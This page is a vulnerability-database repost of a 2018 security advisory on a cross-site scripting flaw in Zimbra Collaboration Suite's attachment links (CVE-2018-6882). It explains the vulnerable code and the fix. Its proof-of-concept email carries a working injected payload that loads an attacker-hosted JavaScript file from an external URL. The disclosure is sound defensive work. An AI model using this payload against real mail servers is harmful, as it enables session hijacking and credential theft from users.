Vulners
Lucene search
Zimbra Collaboration Suite 8.7.11_GA_1854 Cross Site Scripting
🗓️ 25 Mar 2018 00:00:00Reported by Securify B.V.Type 
packetstorm🔗 packetstormsecurity.com👁 115 Views
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | CVE-2018-6882 | 27 Mar 201800:00 | – | attackerkb |
 | The vulnerability of the ZmMailMsgView.getAttachmentLinkHtml() function in the Zimbra Collaboration Suite email management system allows a hacker to execute arbitrary code. | 15 Aug 202200:00 | – | bdu_fstec |
 | CVE-2018-6882 | 4 Dec 202300:51 | – | circl |
 | Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability | 19 Apr 202200:00 | – | cisa_kev |
 | Zimbra Collaboration Suite Cross-Site Scripting Vulnerability | 29 Mar 201800:00 | – | cnvd |
 | Zimbra Collaboration Suite Cross Site Scripting (CVE-2018-6882) | 23 May 202200:00 | – | checkpoint_advisories |
 | CVE-2018-6882 | 27 Mar 201816:00 | – | cve |
 | CVE-2018-6882 | 27 Mar 201816:00 | – | cvelist |
 | Old Zimbra vulnerability used to target Ukrainian Government Organizations | 18 Apr 202213:31 | – | hivepro |
| Weekly Threat Digest: 11 – 17 April 2022 | 21 Apr 202204:59 | – | hivepro |
10
`------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Zimbra Collaboration Suite due to
the way it handles attachment links
------------------------------------------------------------------------
Stephan Kaag, January 2018
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting (XSS) vulnerability was found in Zimbra
Collaboration Suite (ZCS). This issue allows an attacker to perform a
wide variety of actions such as performing arbitrary actions on their
behalf or presenting a fake login screen to collect usernames and
passwords. In order to exploit this issue, the attacker has to lure a
victim into opening a specially crafted email in ZCS.
------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- CVE-2018-6882
- https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.7
- https://bugzilla.zimbra.com/show_bug.cgi?id=108786
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on ZCS 8.7.11_GA_1854 (build
20170531151956). It is however likely that this issue is present in all
versions of ZCS from version 8.5.0 on.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
The issue is fixed in Zimbra Collaboration Suite version 8.8.7.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vulnerability-in-zimbra-collaboration-suite-due-to-the-way-it-handles-attachment-links.html
If an email is opened that contains one or more attachments, a link ('<a>' tag) is created for each attachment. The code responsible for doing this is contained in the ZmMailMsgView.getAttachmentLinkHtml function.
ZmMailMsgView.getAttachmentLinkHtml =
function(params) {
var html = [],
i = 0;
html[i++] = "<a class='AttLink' ";
[..]
var href = params.href || (params.jsHref && "javascript:;");
html[i++] = href ? "href='" + href + "' " : "";
[..]
html[i++] = "'>" + AjxStringUtil.htmlEncode(params.text) + "</a>";
return html.join("");
};
In the above code the value for params.href is taken directly from the Content-Location header in the message. No sanitization is performed, and the value in the header can be influenced by an attacker. As a result it is possible to inject arbitrary HTML or JavaScript in the '<a>'-tag.
To exploit this issue an attacker can send an email with a specially crafted Content-Location header to a victim user. When the victim opens this message the script code will be executed.
Proof of concept
The following proof of concept email can be used to demonstrate this issue. When opening this mail, a JavaScript file from an external location will be loaded in Zimbra.
---[snip]---
From: [email protected]
To: [email protected]
Subject: Re: My message
MIME-Version: 1.0
Date: Thu, 4 Jan 2018 14:25:25 +0100 (CET)
Content-Type: multipart/mixed;
boundary="----=_Part_112602234_144352703.1515072325170"
------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 7bit
------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; name=attachment.txt
Content-Disposition: attachment; filename=attachment.txt
Content-Transfer-Encoding: base64
Content-Location: http://foo.bar'></a><img src=a onerror=window.x=document.createElement('script');window.x.src='https://s3-eu-west-1.amazonaws.com/eviljs/evil.js';document.body.appendChild(window.x)><a href='
YXR0YWNobWVudAo=
------=_Part_112602234_144352703.1515072325170--
---[snip]---
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Mar 2018 00:00Current
6.9Medium risk
Vulners AI Score6.9
EPSS0.77015